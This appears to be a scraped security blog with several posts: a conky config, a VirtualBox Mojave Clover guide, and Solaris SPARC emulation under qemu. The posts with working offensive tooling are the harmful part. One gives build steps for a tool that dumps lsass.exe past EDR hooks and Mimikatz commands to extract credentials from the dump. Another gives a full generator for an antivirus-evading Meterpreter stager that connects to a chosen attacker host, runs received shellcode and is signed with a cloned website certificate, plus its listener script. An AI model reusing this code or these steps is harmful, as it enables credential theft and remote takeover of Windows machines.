xftfont cure:size=8
update_interval 2
cpu_avg_samples 2
net_avg_samples 2
double_buffer yes
maximum_width 320
draw_shades no
draw_outline no
draw_borders no
stippled_borders 1
border_width 20
default_color white
default_shade_color white
default_outline_color white
alignment top_right
gap_x 15
gap_y 0
use_spacer left
no_buffers yes
uppercase no

TEXT
${color}${alignc}${time %A %d of %B, %Y}${color lightgrey} | ${color}${time %H:%M:%S}

${color}${alignc}${color lightgrey}Uptime: ${color}$uptime${color lightgrey} | ${color lightgrey}Load: $color$loadavg

${color lightgrey}${alignc}Battery :$color ${battery}${color lightgrey} | ${color lightgrey}ET: ${color}$battery_time
${alignc}${color #14A734}${battery_bar 8,300}
${color #656565}$stippled_hr$color
${color} $wireless_essid${alignr}${color lightgrey}| ${color lightgrey}Signal:${color}${wireless_link_qual_perc wlp9s0}%

${color lightgrey} Down:${color}${downspeedf wlp9s0} KB/s${alignr}${color lightgrey}Up:${color}${upspeedf wlp9s0} KB/s 
${color #000000}${downspeedgraph wlp9s0 12,140 000000 14A734}${alignr}${color #000000}${upspeedgraph wlp9s0 12,140 000000 14A734}
${color lightgrey} Total: $color${totaldown wlp9s0}${alignr}${color lightgrey}Total: ${color}${totalup wlp9s0} 
${color #656565}$stippled_hr$color
${alignc}${color}${execi 1000 cat /proc/cpuinfo | grep 'model name' | sed -e 's/model name.*: //'| uniq}
${alignc}${color #000000}${cpugraph 13,318 000000 14A734}

${color lightgrey}Total CPU Usage: ${color}${cpu cpu0}%${alignr}${color lightgrey}| ${color lightgrey}CPU Temperature: ${color}${hwmon 1 temp 1}°C

${color lightgrey} C1: ${color}${cpu cpu1}% ${color lightgrey}@ ${color}${freq 1} MHz${color #14A734}${alignr}${color lightgrey}C2: ${color}${cpu cpu2}% ${color lightgrey}@ ${color}${freq 2} MHz 
${color #14A734}${cpubar cpu1 6,150}${alignr}${color #14A734}${cpubar cpu2 6,150}
${color lightgrey} C3: ${color}${cpu cpu3}% ${color lightgrey}@ ${color}${freq 3} MHz${color #14A734}${alignr}${color lightgrey}C4: ${color}${cpu cpu4}% ${color lightgrey}@ ${color}${freq 4} MHz 
${color #14A734}${cpubar cpu3 6,150}${alignr}${color #14A734}${cpubar cpu4 6,150}
${color #656565}$stippled_hr$color
${alignc}${color lightgrey}Resources

${color lightgrey}Ram ${alignc} ${color}$mem${color lightgrey} / ${color}$memmax ${alignr}${memperc}% Used
${color #14A734}${membar 6,318}
${color lightgrey}Swap ${alignc} ${color}${swap}${color lightgrey} / ${color}${swapmax} ${alignr}${swapperc}% Used
${color #14A734}${swapbar 6,318}
${color lightgrey}$fs_type ${alignc} ${color}${fs_used}${color lightgrey} / ${color}${fs_size} ${alignr}${fs_used_perc /}% Used
${color #14A734}${fs_bar 6,318 /}
${color lightgrey}Disk Read IO: $color${diskio_read}${alignr}${color lightgrey}Disk Write IO: ${color}${diskio_write}
${color #000000}${diskiograph_read 12,145 000000 14A734}${alignr}${color #000000}${diskiograph_write 12,145 000000 14A734}
${color #656565}$stippled_hr$color

 

 

Customizing the Clover.iso Mojave loader


A short howto on building a custom Clover.iso for your VirtualBox Mojave VM. You need an existing macOS system, real or virtual (VirtualBox), for the script to prepare the Clover.iso.

Below is an example script that produces a 1980×1080 Clover.iso, which you then attach to the VirtualBox VM to boot Mojave.

Please read the previous howtos on how to do this here https://astr0baby.wordpress.com/2018/08/03/installing-mojave-10-14-beta-in-virtualbox-5-2-16-on-linux-x86_64/

Updated clover.sh script (chmod +x clover.sh)

#!/bin/bash
set -euo pipefail

# Base config.plist from Alexander Willner's runMacOSinVirtualBox project
curl -L https://raw.githubusercontent.com/AlexanderWillner/runMacOSinVirtualBox/master/config.plist -o config.plist

# We will set a custom resolution here 1980x1080
# (BSD sed on macOS needs an explicit, possibly empty, backup suffix after -i)
sed -i '' -e 's/1680x1050/1980x1080/g' config.plist

#### Please replace your path to the apfs.efi on your macOS installation #####
cp "/Volumes/Macintosh HD/usr/standalone/i386/apfs.efi" "./apfs.efi"
#### Please replace your path to the apfs.efi on your macOS installation #####

# Clover r4533 bootable ISO. TLS verification stays on (no curl -k): this is boot
# code the VM will execute before anything else, so do not fetch it blindly.
curl -L https://sourceforge.net/projects/cloverefiboot/files/Bootable_ISO/CloverISO-4533.tar.lzma/download -o clover.tar.lzma
xz -d clover.tar.lzma
tar xf clover.tar
hdiutil detach /Volumes/Clover-v2.4k-4533-X64/ 2>/dev/null || true
hdiutil attach Clover-v2.4k-4533-X64.iso

# Fresh FAT image; hdiutil create refuses to overwrite, so clear leftovers first.
# The script expects the image to mount as /Volumes/NO NAME.
rm -f ./clover.dmg ./clover.iso
hdiutil create -megabytes 16 -fs MS-DOS -volname MojaveClover -o ./clover.dmg
hdiutil detach /Volumes/NO\ NAME/ 2>/dev/null || true
hdiutil attach ./clover.dmg
cp -r /Volumes/Clover-v2.4k-4533-X64/* /Volumes/NO\ NAME/
cp ./config.plist /Volumes/NO\ NAME/EFI/CLOVER/
cp ./apfs.efi /Volumes/NO\ NAME/EFI/CLOVER/drivers64UEFI/

hdiutil detach /Volumes/Clover-v2.4k-4533-X64/
hdiutil detach /Volumes/NO\ NAME/
hdiutil makehybrid -iso -joliet -o ./clover.iso ./clover.dmg

The same script can be used to change other keys in config.plist (left to the reader to experiment with). One worth knowing about: the default config.plist ships with System Integrity Protection switched off completely

CsrActiveConfig
0x67

Change it to 0x0 if you want SIP on, matching a stock Mojave install:

csr-active-config 0x0 = SIP Enabled (Default)
csr-active-config 0x3 = SIP Partially Disabled (unsigned kexts load, system volume writable)
csr-active-config 0x67 = SIP Disabled completely

Keep in mind that a VM booted with 0x67 behaves quite differently from a real Mac (unsigned kexts load, task_for_pid works against system processes), so do not use such a VM as a model when testing macOS security controls.

Here is the mandatory VirtualBox 1980×1080 script that needs to be executed prior to loading Mojave

#!/bin/bash
readonly VM_RES="1980x1080"
readonly NAME="Mojave"

VBoxManage modifyvm "$NAME" --usbxhci on --firmware efi --chipset ich9 --mouse usbtablet --keyboard usb
VBoxManage setextradata "$NAME" "CustomVideoMode1" "${VM_RES}x32"
VBoxManage setextradata "$NAME" VBoxInternal2/EfiGraphicsResolution "$VM_RES"
VBoxManage modifyvm "$NAME" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1

Once you have all in place – you will get the 1980×1080 resolution working in the VirtualBox Mojave emulation

For the impatient, the prebuilt clove4k.iso is here -> https://drop.me/M3pZW7

AndrewSpecial – stealthy lsass.exe memory dumping


A very short entry. I came across an interesting article on bypassing an endpoint security product's memory protection (user-mode API hooking) to dump lsass.exe without being detected: https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6

Naturally one wants to reproduce the steps, and since the code is available here:

https://github.com/hoangprod/AndrewSpecial/tree/master

I have just done that in my lab.

The notes below might save a few seconds if you get stuck compiling it (I used Visual Studio 2013 on Windows 7 SP1 64-bit to build it).

# On Windows build server just download the master.zip 
https://github.com/hoangprod/AndrewSpecial/archive/master.zip


Modify AndrewSpecial.h to include the additional #pragma comment (lib, "advapi32.lib"), so the linker picks up the advapi32 functions (privilege adjustment) the source uses:

#include <Windows.h>
#include <stdio.h>
#include <winternl.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <DbgHelp.h>

#pragma comment (lib, "Dbghelp.lib")
#pragma comment (lib, "ntdll.lib")
#pragma comment (lib, "advapi32.lib")

void getversion_long();
bool AndrewSpecial(const wchar_t * ProcessName);
EXTERN_C NTSTATUS NTAPI NtReadVirtualMemory(HANDLE, PVOID, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* RtlGetVersion_t)(_Out_ PRTL_OSVERSIONINFOW lpVersionInformation);

enum supported_versions
{
win8 = 0x060200,
win81 = 0x060300,
win10 = 0x0A0000,
};

Open up the 64bit VS2013 x64 Native Tools Command Prompt  and cd to the source directory

cl *.cpp /DUNICODE

Next we transfer the compiled Andrew.exe binary to our lab Windows 10 box and execute it. Two caveats: the dump only contains usable secrets when lsass.exe is not running as a protected process (RunAsPPL off), because a PPL cannot be opened with PROCESS_VM_READ from a normal process even with SeDebugPrivilege; and with Credential Guard enabled the NTLM hashes and Kerberos keys live in the isolated LSA process, so they are not in the dump at all.

The resulting Andrew.dmp is an ordinary minidump of lsass.exe and can be fed to a separate instance of Mimikatz on some other machine as follows

mimikatz # sekurlsa::minidump Andrew.dmp
mimikatz # sekurlsa::logonPasswords

Courtesy of CaledoniaProject

https://github.com/hoangprod/AndrewSpecial/pull/1/commits/0320bf38ad02aa8b000b8095be35242b826d0f64

Custom-Meterpreter loader in 2019


I have been using this generator for quite a while and it has always worked for me. I decided to enhance it with an additional step that clones a website's certificate and signs the executable with the clone; the original concept is from https://github.com/paranoidninja/CarbonCopy

The script is tested on Linux Mint and should work on Ubuntu and other Debian derivatives: the dependency checks I added use dpkg-query to probe whether the required packages are installed. Adapting it to CentOS, Red Hat or other distributions is a matter of swapping in the appropriate package checks, which I leave to the reader.

Below is the source of the generator script. It produces a 64-bit Windows PE32+ binary with the Meterpreter handler address and port hardcoded inside, signed with a certificate cloned from a website of our choice (www.google.com for example). Only the certificate fields are copied; the key pair is freshly generated and the clone is self-signed, so the signature does not validate on Windows (and osslsigncode verify will say so), but it adds one more thing for AV heuristics to get wrong.

#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo " Based on NinjaParanoid's CarbonCopy "
echo " "
echo " For Debian based system Ubuntu/Mint "
echo " PE32+ executable (GUI) x86-64 "
echo "****************************************************************"

# Check if we are on Debian/Ubuntu 
if [ $(which dpkg-query | grep -c "dpkg-query") -eq 0 ]; 
then echo "[-] no dpkg-query found in path, not a Debian/Ubuntu based system, manually change the script" 
echo " This script relies on dpkg-query to check for required packages, if running on other platform" 
echo " Simply remove the section starting from #Debian-start and finishing at #Debian-end" 
echo " Make sure you manually install the dependant packages" 
echo ""
echo "- mingw-w64 "
echo "- python-openssl" 
echo "- osslsigncode" 
exit
fi

echo "[*] Checking if required software is installed " 
dpkg --get-selections mingw-w64 python-openssl osslsigncode 
if [ $(dpkg-query -W -f='${Status}' mingw-w64 2>/dev/null | grep -c "ok installed") -eq 0 ]; 
then echo "[-] Missing mingw-w64 run apt-get install mingw-w64"
exit
fi
if [ $(dpkg-query -W -f='${Status}' python-openssl 2>/dev/null | grep -c "ok installed") -eq 0 ]; 
then echo "[-] Missing python-openssl run apt-get install python-openssl"
exit
fi
if [ $(dpkg-query -W -f='${Status}' osslsigncode 2>/dev/null | grep -c "ok installed") -eq 0 ];
then echo "[-] Missing osslsigncode apt-get install osslsigncode"
exit
fi

echo -en 'Metasploit server IP : ' 
read ip
echo -en 'Metasploit port number : ' 
read port 
echo -en 'Impersonate Certificate https site (www.google.com): ' 
read hostname
echo '#include <stdio.h>'> temp.c 
echo '#include <stdlib.h>' >> temp.c 
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c 
echo -n 'unsigned char lambert[]="' >> temp.c 
echo -n $ip >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo -n 'unsigned char omega[]="' >> temp.c 
echo -n $port >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo 'void winsock_init() {' >> temp.c 
echo ' WSADATA wsaData;' >> temp.c 
echo ' WORD wVersionRequested;' >> temp.c 
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c 
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c 
echo ' printf("bad\n"); '>> temp.c 
echo ' WSACleanup(); '>> temp.c 
echo ' exit(1);'>> temp.c 
echo ' }' >> temp.c 
echo ' }' >> temp.c 
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c 
echo ' printf("r %s\n", error);'>> temp.c 
echo ' closesocket(my_socket);'>> temp.c 
echo ' WSACleanup();'>> temp.c 
echo ' exit(1);' >> temp.c 
echo ' }' >> temp.c 
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c 
echo ' int tret = 0;'>> temp.c 
echo ' int nret = 0;'>>temp.c 
echo ' void * startb = buffer;'>> temp.c 
echo ' while (tret < len) {'>>temp.c 
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c 
echo ' /* bail on error AND on orderly close, otherwise a dropped handler spins this loop forever */'>> temp.c 
echo ' if (nret == SOCKET_ERROR || nret == 0)'>> temp.c 
echo ' punt(my_socket, "no data");'>> temp.c 
echo ' startb = (char *)startb + nret;'>> temp.c 
echo ' tret += nret;'>>temp.c 
echo ' }'>>temp.c 
echo ' return tret;'>> temp.c 
echo '}' >> temp.c 
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c 
echo ' struct hostent * target;' >> temp.c 
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c 
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c 
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c 
echo ' punt(my_socket, ".");'>>temp.c 
echo ' target = gethostbyname(targetip);'>>temp.c 
echo ' if (target == NULL)'>>temp.c 
echo ' punt(my_socket, "..");'>>temp.c 
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c 
echo ' sock.sin_family = AF_INET;'>> temp.c 
echo ' sock.sin_port = htons(port);'>>temp.c 
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c 
echo ' punt(my_socket, "...");'>>temp.c 
echo ' return my_socket;'>>temp.c 
echo '}' >> temp.c 
echo 'int main(int argc, char * argv[]) {' >> temp.c 
echo ' FreeConsole();'>>temp.c 
echo ' Sleep(15);'>>temp.c 
echo ' ULONG32 size;'>>temp.c 
echo ' char * buffer;'>>temp.c 
echo ' void (*function)();'>>temp.c 
echo ' winsock_init();'>> temp.c 
echo ' SOCKET my_socket = wsconnect(lambert, atoi(omega));'>>temp.c 
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c 
echo ' if (count != 4 || size <= 0)'>>temp.c 
echo ' punt(my_socket, "error length\n");'>>temp.c 
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c 
echo ' if (buffer == NULL)'>>temp.c 
echo ' punt(my_socket, "error in buf\n");'>>temp.c 
echo ' buffer[0] = 0xBF;'>>temp.c 
echo ' memcpy(buffer + 1, &my_socket, 4);'>>temp.c 
echo ' count = recv_all(my_socket, buffer + 5, size);'>>temp.c 
echo ' function = (void (*)())buffer;'>>temp.c 
echo ' function();'>>temp.c 
echo ' return 0;'>>temp.c 
echo '}' >> temp.c 
echo '(+) Compiling binary ..' 
x86_64-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows 
ls -la temp.c
strip payload.exe 
file=`ls -la payload.exe` ; echo '(+)' $file

#Cleanup previous run 
rm -f carboncopy.py
cat <<'EOF' > carboncopy.py
#!/usr/bin/python3

##Author : Paranoid Ninja
##Email : paranoidninja@protonmail.com
##Descr : Spoofs SSL Certificates and Signs executables to evade Antivirus


from OpenSSL import crypto
from sys import argv, platform
import ssl
import os
import subprocess

def CarbonCopy(host, port, signee, signed):

    try:
        #Fetching Details
        print("[+] Loading public key of %s in Memory..." % host)
        ogcert = ssl.get_server_certificate((host, int(port)))
        x509 = crypto.load_certificate(crypto.FILETYPE_PEM, ogcert)

        certDir = r'certs'
        if not os.path.exists(certDir):
            os.makedirs(certDir)

        #Creating Fake Certificate
        CNCRT = certDir + "/" + host + ".crt"
        CNKEY = certDir + "/" + host + ".key"
        PFXFILE = certDir + "/" + host + '.pfx'

        #Creating Keygen (a fresh key pair of the same size; the site's real private key is of course unknown)
        k = crypto.PKey()
        k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits()))
        cert = crypto.X509()

        #Setting Cert details from loaded from the original Certificate
        print("[+] Cloning Certificate Version")
        cert.set_version(x509.get_version())
        print("[+] Cloning Certificate Serial Number")
        cert.set_serial_number(x509.get_serial_number())
        print("[+] Cloning Certificate Subject")
        cert.set_subject(x509.get_subject())
        print("[+] Cloning Certificate Issuer")
        cert.set_issuer(x509.get_issuer())
        print("[+] Cloning Certificate Registration & Expiration Dates")
        cert.set_notBefore(x509.get_notBefore())
        cert.set_notAfter(x509.get_notAfter())
        cert.set_pubkey(k)
        print("[+] Signing Keys")
        #Self-signed with the new key: the issuer name is copied, but the chain will not validate
        cert.sign(k, 'sha256')

        print("[+] Creating %s and %s" %(CNCRT, CNKEY))
        open(CNCRT, "wt").write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8'))
        open(CNKEY, "wt").write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode('utf-8'))
        print("[+] Clone process completed. Creating PFX file for signing executable...")

        pfx = crypto.PKCS12Type()
        pfx.set_privatekey(k)
        pfx.set_certificate(cert)
        pfxdata = pfx.export()

        with open((PFXFILE), 'wb') as pfile:
            pfile.write(pfxdata)

        if (platform == "win32"):
            print("[+] Platform is Windows OS...")
            print("[+] Signing %s with signtool.exe..." %(signed))
            print(subprocess.check_output("copy " + signee + " " + signed, shell=True).decode())
            print(subprocess.check_output("signtool.exe sign /v /f " + PFXFILE + " /d \"MozDef Corp\" /tr \"http://sha256timestamp.ws.symantec.com/sha256/timestamp\" /td SHA256 /fd SHA256 " + signed, shell=True).decode())

        else:
            print("[+] Platform is Linux OS...")
            print("[+] Signing %s with %s using osslsigncode..." %(signee, PFXFILE))
            args = ("osslsigncode", "sign", "-pkcs12", PFXFILE, "-n", "Notepad Benchmark Util", "-i", "http://sha256timestamp.ws.symantec.com/sha256/timestamp", "-in", signee, "-out", signed)
            popen = subprocess.Popen(args, stdout=subprocess.PIPE)
            popen.wait()
            output = popen.stdout.read()
            print("[+] " + output.decode('utf-8'))

    except Exception as ex:
        print("[X] Something Went Wrong!\n[X] Exception: " + str(ex))

def main():
    if (len(argv) != 5):
        print(""" +-+-+-+-+-+-+-+-+-+-+-+-+
|C|a|r|b|o|n|S|i|g|n|e|r|
+-+-+-+-+-+-+-+-+-+-+-+-+""")
        print("\n CarbonSigner v1.0\n Author: Paranoid Ninja\n\n[+] Descr: Impersonates the Certificate of a website\n[!] Usage: " + argv[0] + " <hostname> <port> <build-executable> <signed-executable>\n")
    else:
        print(""" +-+-+-+-+-+-+-+-+-+-+-+-+
|C|a|r|b|o|n|S|i|g|n|e|r|
+-+-+-+-+-+-+-+-+-+-+-+-+""")
        print("\n CarbonSigner v1.0\n Author: Paranoid Ninja\n")
        CarbonCopy(argv[1], argv[2], argv[3], argv[4])

if __name__=="__main__":
    main()

EOF

python ./carboncopy.py $hostname 443 ./payload.exe ./payload-signed.exe
ls -la ./payload-signed.exe 
osslsigncode verify ./payload-signed.exe
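To make the handshake the generated loader performs explicit, here is an added Python model of both ends of the staging protocol (example code, not part of the generator above nor of rsmudge's metasploit-loader): the handler sends a 4-byte little-endian stage length followed by the stage; the loader reads exactly that many bytes and prefixes them with 0xBF plus the socket handle, so the buffer begins with `mov edi, <socket>` (in 64-bit mode that write zero-extends into rdi, where the x64 stage expects its socket), and the result is what the C code jumps into. The loopback driver, the size cap and the EOF handling are my additions; nothing here executes the stage.

```python
import socket
import struct
import threading

# Wire protocol implemented by the generated loader (rsmudge's metasploit-loader scheme):
#   handler -> loader : ULONG32 little-endian stage length, then the stage itself
#   loader            : RWX buffer = 0xBF, socket handle (4 bytes LE), stage; then jump to it
# 0xBF imm32 encodes `mov edi, imm32`; in 64-bit mode the write zero-extends into rdi,
# which is where the x64 meterpreter stage expects its socket handle.
MOV_EDI_IMM32 = b"\xbf"
MAX_STAGE = 16 * 1024 * 1024   # assumption: sanity cap, a real stage is far smaller


def frame_stage(stage: bytes) -> bytes:
    """Handler side: what multi/handler writes for a staged reverse_tcp payload."""
    return struct.pack("<I", len(stage)) + stage


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Loader side: read exactly n bytes. A zero-length recv means the peer closed and must
    be treated as an error, otherwise a naive loop spins forever on a dropped handler."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return bytes(buf)


def receive_stage(sock: socket.socket, max_stage: int = MAX_STAGE) -> bytes:
    """Loader side: length-prefixed read, rejecting absurd lengths before allocating for them."""
    (size,) = struct.unpack("<I", recv_exact(sock, 4))
    if size == 0 or size > max_stage:
        raise ValueError("implausible stage length %d" % size)
    return recv_exact(sock, size)


def build_exec_buffer(sock_handle: int, stage: bytes) -> bytes:
    """Loader side: the image the C code writes into its PAGE_EXECUTE_READWRITE allocation."""
    return MOV_EDI_IMM32 + struct.pack("<I", sock_handle & 0xFFFFFFFF) + stage


def loader_receive_from(wire: bytes, sock_handle: int = 0x1234) -> bytes:
    """Drive the loader half against a fake handler that writes `wire` and hangs up.
    Returns the buffer the loader would jump into (it is never executed here)."""
    handler_end, loader_end = socket.socketpair()

    def fake_handler():
        handler_end.sendall(wire)
        handler_end.close()

    t = threading.Thread(target=fake_handler)
    t.start()
    try:
        stage = receive_stage(loader_end)
    finally:
        t.join()
        loader_end.close()
    return build_exec_buffer(sock_handle, stage)


if __name__ == "__main__":
    demo_stage = b"\x90" * 64 + b"\xc3"   # constructed: NOP sled + ret, stands in for a real stage
    image = loader_receive_from(frame_stage(demo_stage))
    print("exec buffer: %d bytes, prologue %s" % (len(image), image[:5].hex()))
```

The two failure paths are the ones worth keeping in mind when the C loader misbehaves: a handler that closes early yields a short read, and a non-Metasploit listener on the port yields a garbage length; the C code as generated trusts both.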

Also here is the listener part (run it from the directory where metasploit-framework is installed):

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

It gets the job done: we get a meterpreter shell on the latest Windows 10.0.17134.556 build with an up-to-date Defender.

Just do not do anything silly like process migration, you will get zapped immediately by Defender now :)

MS is getting better and better :)


Running Solaris 5.9 (sparc) on qemu-system-sparc in Linux x86_64 (Mint 19)


This is a straightforward continuation of the last Solaris article about qemu-system-sparc emulation (32-bit SPARC), covered here https://astr0baby.wordpress.com/2018/09/22/running-solaris-2-6-sparc-on-qemu-system-sparc-in-linux-x86_64-mint-19/ 

A good source of information is Artyom Tarasenko's blog entry about Solaris SPARC and qemu http://tyom.blogspot.com/2009/12/solaris-under-qemu-how-to.html

We continue with Solaris 5.9, better known as Solaris 9, for the SPARC architecture, emulated with qemu-system-sparc on x86_64 Linux.

I will describe how I got the system installed by reusing the disk image from the earlier Solaris 5.6 installation, which saves the time of creating the disk partitions from scratch (a bit of a challenge with 5.6).

My version of Qemu is as follows

$ qemu-system-sparc --version
QEMU emulator version 3.0.91 (v3.1.0-rc1-16-g83c496599c-dirty)
Copyright (c) 2003-2018 Fabrice Bellard and the QEMU Project developers

What we will obviously need is the Solaris 9 SPARC installation ISO media.  Here you can get the Solaris 9 9/05 DVD ISO -> https://ufile.io/9qscc

My QEMU 32bit SPARC environment looks like this  and I will explain exact steps that I took to install it

-rw-r--r--  1 user user 2386624512 Jan 27 01:25 disk2.6.img
-rw-r--r--  1 root root 1261174784 Sep 25 00:15 disk2.7.img
-rw-r--r--  1 user user 3733192704 Feb 23 01:42 disk2.9.img
-rwxr-xr-x  1 user user        195 Sep 24 21:40 run-2.6.sh
-rwxr-xr-x  1 root root        195 Sep 24 22:30 run-2.7.sh
-rwxr-xr-x  1 root root        134 Feb 23 01:07 run-2.9-install.sh
-rwxr-xr-x  1 user user        134 Feb 23 01:07 run-2.9.sh
-rw-r--r--  1 user user  565862400 Feb 21  2010 solaris-2.6-sparc.iso
-rw-r--r--  1 root root  647471104 Feb 21  2010 solaris-2.7-sparc.iso
-rw-r--r--  1 root root 3104112640 Feb 22 23:26 solaris-2.9-sparc.iso
-rw-rw-r--  1 user user     262144 Sep 19 21:24 ss5.bin

Next we configure the networking and the /etc/qemu-ifup script. The networking script can be saved in the emulation directory and must be executed with root privileges before running qemu (adjust to your needs: enp0s25 is eth0 and wlp9s0 is wlan0 on my laptop). Let's call it network.sh. Note that it bridges the physical NIC in, which puts the deliberately unpatched guest on the wired LAN's broadcast domain; leave enp0s25 out of the bridge when the host is on a network you do not control.

#!/bin/sh
# Setup tap and bridge: run as root before starting qemu.
# enp0s25 = wired NIC (eth0), wlp9s0 = wifi uplink (wlan0), vboxnet0 = VirtualBox host-only net
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
# bridging enp0s25 exposes the guest to the wired LAN; drop it here on untrusted networks
brctl addif br0 enp0s25 vboxnet0 
brctl setfd br0 0
ifconfig enp0s25 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0
ifconfig tap0 0.0.0.0
# NAT the 10.0.2.0/24 guest network out through the wifi interface
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface enp0s25 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlp9s0 -j MASQUERADE

Here is my slightly modified /etc/qemu-ifup script

#! /bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.

# in order to be able to find brctl
PATH=$PATH:/sbin:/usr/sbin
ip=$(which ip)

if [ -n "$ip" ]; then
    ip link set "$1" up
else
    brctl=$(which brctl)
    if [ ! "$ip" -o ! "$brctl" ]; then
        echo "W: $0: not doing any bridge processing: neither ip nor brctl utility not found" >&2
        exit 0
    fi
    ifconfig "$1" 0.0.0.0 up
fi

switch=$(ip route ls |
    awk '/^default / {
        for(i=0;i<NF;i++) { if ($i == "dev") { print $(i+1); next; } }
    }'
)

# override the auto-detected default-route device: the guest tap always goes into br0
switch=br0

# only add the interface to default-route bridge if we
# have such interface (with default route) and if that
# interface is actually a bridge.
# It is possible to have several default routes too
for br in $switch; do
    if [ -d /sys/class/net/$br/bridge/. ]; then
        if [ -n "$ip" ]; then
            ip link set "$1" master "$br"
        else
            brctl addif $br "$1"
        fi
        exit # exit with status of the previous command
    fi
done

echo "W: $0: no bridge for guest interface found" >&2

I usually setup the internal network in emulated Solaris as follows then:

  • interface: 10.0.2.10
  • gateway : 10.0.2.2
  • nameserver: 8.8.8.8

INSTALLING SOLARIS 9

The run-2.9-install.sh script is as follows

qemu-system-sparc -L . -m 256 -M SS-5  -hda ./disk2.9.img -cdrom ./solaris-2.9-sparc.iso -net nic -net tap  -boot d  -display vnc=:1

Use your VNC client to connect to display :1 (TCP 5901) to interact with the emulation. Note that vnc=:1 listens on every interface with no authentication; on anything but an isolated lab host use -display vnc=127.0.0.1:1 and tunnel the port over ssh.

The disk2.9.img is a QCOW2 image from the previous Solaris 2.6 installation which we can use (please follow the https://astr0baby.wordpress.com/2018/09/22/running-solaris-2-6-sparc-on-qemu-system-sparc-in-linux-x86_64-mint-19/) to create one or start from scratch…

# qemu-img info disk2.9.img
image: disk2.9.img
file format: qcow2
virtual size: 36G (38654705664 bytes)
disk size: 3.5G
cluster_size: 65536
Format specific information:
    compat: 1.1
    lazy refcounts: false
    refcount bits: 16
    corrupt: false

We are no longer using the ss5.bin firmware file, since qemu-system-sparc handles Solaris 9 SPARC quite well without it; for the GUI we use QEMU's built-in VNC server.

The installation is again straight forward (do not upgrade the system from 5.6 to 5.9 but rather initialize the disk during setup and use default options)

Once we get this installed (takes some time, be patient) we can use the following script to boot the system from disk  – Use your VNC client to connect to :1

qemu-system-sparc -L . -m 256 -M SS-5 -hda ./disk2.9.img -cdrom ./solaris-2.9-sparc.iso -net nic -net tap -boot c -display vnc=:1

So now we have a fully working Solaris 9 9/05, reachable at 10.0.2.10 via ssh, telnet or ftp, and operated over VNC :1

A default installation of Solaris 9 of course leaves many insecure and obsolete daemons exposed; just for the heck of it, here is an Nmap scan

Solaris9 is way much better to work with than any other Unix systems I came across :)

Also do not forget to configure the DNS resolver (Google and Cloudflare DNS here):

# echo "nameserver 8.8.8.8" > /etc/resolv.conf
# echo "nameserver 1.1.1.1" >> /etc/resolv.conf

# vi /etc/nsswitch.conf
hosts: files dns

# pkill -HUP inetd

Here is a short video of the actual emulation

Testing EQGRP tools against Qemu virtualized Solaris 6/7/8/9 (sparc) Pt.1


So after we have managed to fully virtualize Solaris 5.6/5.7/5.8 and 5.9 via qemu-system-sparc on an x86_64 Linux host, we can move on to testing the infamous Shadow Brokers leaked Solaris hacking tools, mainly the notorious ebbisland.

If you want to experiment a git clone of the EQGRP dump is located here https://github.com/x0rz/EQGRP

